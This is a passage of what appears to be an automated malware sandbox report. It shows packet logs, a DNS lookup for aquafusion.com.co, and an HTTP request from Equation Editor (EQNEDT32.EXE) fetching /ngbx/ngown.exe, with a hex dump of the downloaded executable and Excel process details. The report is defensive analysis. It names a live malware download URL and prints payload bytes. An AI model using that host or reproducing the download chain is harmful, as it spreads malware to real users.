                          Dec 13, 2024 17:54:42.095248938 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.095292091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.095896006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.095931053 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.095932961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.095964909 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.096628904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.096668005 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.096709013 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.096740961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.097771883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.097817898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.097836018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.097870111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.098750114 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.098787069 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.098838091 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.098870039 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.099684954 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.099725008 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.099844933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.099884987 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.100701094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.100744009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.100805044 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.100841045 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.101723909 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.101739883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.101762056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.101778984 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.102643967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.102654934 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.102679014 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.102699041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.103579998 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.103614092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.103781939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.104104042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.104554892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.104589939 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.104763985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.104796886 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.105642080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.105689049 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.105787992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.105825901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.106579065 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.106596947 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.106628895 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.106772900 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.107547998 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.107599974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.107686043 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.107728004 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.108596087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.108647108 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.108695030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.108733892 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.109507084 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.109563112 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.109710932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.109750986 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.110519886 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.110565901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.110629082 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.110673904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.111663103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.111685038 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.111716986 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.111733913 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.112520933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.112571955 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.112626076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.112668037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.113493919 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.113540888 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.113600016 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.113639116 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.114480019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.114531994 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.114566088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.114608049 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.115489006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.115536928 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.115628004 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.115669012 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.116400003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.116450071 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.116583109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.116622925 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.117468119 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.117516041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.117595911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.117635965 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.118421078 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.118468046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.118519068 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.118557930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.119533062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.119579077 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.120330095 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.120361090 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.120373011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.120398998 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.120412111 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.120454073 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.121494055 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.121514082 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.121550083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.122397900 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.122427940 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.122440100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.122478008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.122514963 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.123369932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.123416901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.123462915 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.123501062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.124511957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.124586105 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.264606953 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.264626026 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.264682055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.265089035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.265100002 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.265131950 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.266057014 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.266068935 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.266098976 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.267088890 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.267101049 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.267147064 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.268121004 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.268132925 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.268165112 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.269026995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.269038916 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.269072056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.270081997 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.270093918 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.270123959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.271059990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.271071911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.271104097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.271116018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.272017002 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.272028923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.272061110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.273030996 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.273041964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.273068905 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.273078918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.274046898 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.274058104 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.274086952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.275043964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.275055885 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.275082111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.276010990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.276022911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.276047945 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.277013063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.277024984 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.277055979 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.278101921 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.278112888 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.278145075 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.279011965 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279023886 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279052019 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.279934883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279947042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279973984 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.279982090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.280901909 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.280920982 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.280951977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.280961990 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.282001019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.282012939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.282043934 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.282979012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.282990932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.283018112 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.283025980 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.283878088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.283895969 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.283948898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.284950018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.284960985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.284989119 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.285979033 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.285990953 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.286024094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.286953926 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.286964893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.286995888 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.287864923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.287875891 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.287908077 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.288903952 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.288917065 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.288944960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.289858103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.289870024 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.289904118 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.290791035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.290829897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.291388035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.291429996 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.291898012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.291909933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.291941881 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.292829037 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.292840958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.292875051 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.293857098 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.293874025 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.293910027 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.293910027 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.294848919 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.294861078 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.294891119 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.295923948 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.295936108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.295969009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.296838045 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.296849966 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.296901941 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.297705889 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.297758102 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.297947884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.297990084 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.298739910 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.298752069 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.298782110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.299743891 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.299761057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.299784899 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.299802065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.300848007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.300859928 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.300888062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.300900936 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.301696062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.301738977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.301903963 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.301944017 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.302638054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.302687883 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:45.519542933 CET4916180192.168.2.22190.90.160.170

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 13, 2024 17:54:38.217216969 CET5456253192.168.2.228.8.8.8
                          Dec 13, 2024 17:54:38.961677074 CET53545628.8.8.8192.168.2.22

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Dec 13, 2024 17:54:38.217216969 CET192.168.2.228.8.8.80x3fa1Standard query (0)aquafusion.com.coA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Dec 13, 2024 17:54:38.961677074 CET8.8.8.8192.168.2.220x3fa1No error (0)aquafusion.com.co190.90.160.170A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • aquafusion.com.co

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.2249161190.90.160.170803412C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          TimestampBytes transferredDirectionData
                          Dec 13, 2024 17:54:39.097635984 CET318OUTGET /ngbx/ngown.exe HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: aquafusion.com.co
                          Connection: Keep-Alive
                          Dec 13, 2024 17:54:40.341106892 CET264INHTTP/1.1 200 OK
                          Connection: Keep-Alive
                          Keep-Alive: timeout=5, max=100
                          content-type: application/x-msdownload
                          last-modified: Tue, 10 Dec 2024 07:12:19 GMT
                          accept-ranges: bytes
                          content-length: 1051136
                          date: Fri, 13 Dec 2024 16:54:40 GMT
                          server: LiteSpeed
                          Dec 13, 2024 17:54:40.341219902 CET1236INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}
                          Dec 13, 2024 17:54:40.341291904 CET1236INData Raw: 00 68 b0 b5 43 00 e8 61 1c 02 00 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f1 6a 0d 5b 8d be 6c 01 00 00 83 ef 10 8b cf e8 fc 47 00 00 4b 79 f3 8d 4e 6c e8 f1 47 00 00 8d 4e 28 e8 e9 47 00 00 56 e8 0b fd 01 00 59 5f 8b c6 5e
                          Data Ascii: hCaYSVWj[lGKyNlGN(GVY_^[SV3Wj_NN(^^~^^^ ^$ef^8NlF:^<^@FLFPFTFXF\F`FddjF|U[dKy3
                          Dec 13, 2024 17:54:40.341305971 CET448INData Raw: 8b 46 0c 3b d8 74 1a 2b c3 50 8d 86 10 08 00 00 03 c3 50 8d 43 02 8d 04 c6 50 57 ff 15 24 f1 48 00 8b 76 04 85 f6 75 8d ff 75 fc 57 e8 d7 fd ff ff 5f 5e 5b 8b e5 5d c2 08 00 81 c1 f0 f7 ff ff 03 c8 3b d9 74 20 2b cb 8d 83 10 08 00 00 51 03 c6 50
                          Data Ascii: F;t+PPCPW$HvuuW_^[];t +QPCPW$HEUMtDuLMtuWzME8tM@tEujPQWEUM#EuMUuWLXLq
                          Dec 13, 2024 17:54:40.341449022 CET1236INData Raw: 83 e4 f8 83 ec 5c 53 56 57 ff 75 08 b9 b0 57 4c 00 e8 94 0e 00 00 8b 0d 10 58 4c 00 8b 04 81 8b 18 8d 44 24 28 50 89 5c 24 10 ff 33 8b b3 c8 01 00 00 ff 15 30 f6 48 00 8b f8 85 f6 0f 84 c5 00 00 00 8b 46 08 f6 80 92 00 00 00 10 0f 84 85 a0 03 00
                          Data Ascii: \SVWuWLXLD$(P\$30HFx%hXLD$%dXLtXLxXLlXLpXLPF0HD$D$D$D$D$P3pHjt$t$W0HFXH@LyFVWVW
                          Dec 13, 2024 17:54:40.341460943 CET224INData Raw: 66 89 86 88 00 00 00 8b 45 18 68 10 09 00 00 66 89 86 8a 00 00 00 66 89 9e 8c 00 00 00 66 89 be 8e 00 00 00 e8 51 f1 01 00 8b 55 08 33 ff 59 89 78 0c 89 78 04 89 86 80 00 00 00 89 70 08 89 38 8b 8a c8 01 00 00 85 c9 74 1b 39 39 75 31 89 01 b9 00
                          Data Ascii: fEhfffQU3Yxxp8t99u1f_^[]$JO2UEVW3F98u[FE=~E7tEDEDG_F^]}tM
                          Dec 13, 2024 17:54:40.341474056 CET1236INData Raw: e8 0e 15 00 00 83 7d 14 ff 74 d2 8d 4d 14 e8 00 15 00 00 eb c8 8b 30 eb 9a 55 8b ec 8b 4d 18 8b 45 0c 81 c9 00 00 00 50 a9 00 00 08 00 75 61 53 56 57 8b 7d 08 33 db 53 ff 35 04 58 4c 00 ff 75 2c ff 37 ff 75 28 ff 75 24 ff 75 20 ff 75 1c 51 ff 75
                          Data Ascii: }tM0UMEPuaSVW}3S5XLu,7u(u$u uQuuP Ht$8]4tSjHPj0VH9!_^[]0%U8SVuW~:m]EEP64HMEVD~HMEU}
                          Dec 13, 2024 17:54:40.341480017 CET224INData Raw: 4c 00 8b 04 b0 8b 18 8b 4b 48 85 c9 79 69 0f b6 83 90 00 00 00 83 f8 1b 77 71 0f b6 80 a5 22 40 00 ff 24 85 89 22 40 00 c6 45 0b 01 80 bb 93 00 00 00 ff 0f 85 18 9c 03 00 83 7b 4c ff 75 55 6a 08 ff 15 28 f5 48 00 50 ff 75 0c ff 15 20 f1 48 00 80
                          Data Ascii: LKHyiwq"@$"@E{LuUj(HPu H}ju8HjH_^[]tjEsL*Ct"@{"@"@C"@{"@
                          Dec 13, 2024 17:54:40.342416048 CET1236INData Raw: 55 8b ec a1 38 58 4c 00 83 ec 0c 8b 4d 08 8b ff 85 c0 74 1c 8b 10 39 0a 74 05 8b 40 04 eb f1 8b 4d 0c 01 4a 04 8b 00 8b 40 08 8b e5 5d c2 08 00 51 89 4d f4 c7 45 f8 01 00 00 00 ff 15 48 f1 48 00 89 45 fc b9 38 58 4c 00 8d 45 f4 50 e8 35 0f 00 00
                          Data Ascii: U8XLMt9t@MJ@]QMEHHE8XLEP5EUMtW}_]UQQSVW}EP7HElEpEPVpHME;tuc;xu[s5HsEE;|}t
                          Dec 13, 2024 17:54:40.342518091 CET1236INData Raw: 00 83 25 40 58 4c 00 00 b9 20 58 4c 00 e8 d2 0c 00 00 b9 0c 58 4c 00 e8 a9 0d 00 00 b9 f0 57 4c 00 e8 3a 31 00 00 a1 e0 57 4c 00 85 c0 0f 85 d3 98 03 00 5e c3 55 8b ec 83 ec 28 53 56 57 68 d0 01 00 00 e8 ca e5 01 00 59 85 c0 0f 84 41 02 00 00 8b
                          Data Ascii: %@XL XLXLWL:1WL^U(SVWhYA.XL}M9WLEPXL}XL]8XLpuE @#E E@ZEE EE}
                          Dec 13, 2024 17:54:40.461426973 CET1236INData Raw: 83 e8 13 0f 84 77 9c 03 00 48 0f 84 2f 9c 03 00 48 48 0f 84 ae 9b 03 00 83 e8 05 0f 85 8f 9b 03 00 57 51 e8 a1 ee ff ff ff 37 ff 15 3c f6 48 00 8b 74 24 0c 83 7f 44 00 75 33 83 7f 64 00 75 38 83 7f 68 00 75 3d 83 7f 50 00 75 42 8b 44 24 14 3b 46
                          Data Ascii: wH/HHWQ7<Ht$Du3du8hu=PuBD$;FtDP3@_^[]3wDHwdHwh<HwP<HL$NUE(SV5XLW,~XLS]


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:11:53:46
                          Start date:13/12/2024
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x13f690000
                          File size:28'253'536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:2
                          Start time:11:54:35
                          Start date:13/12/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
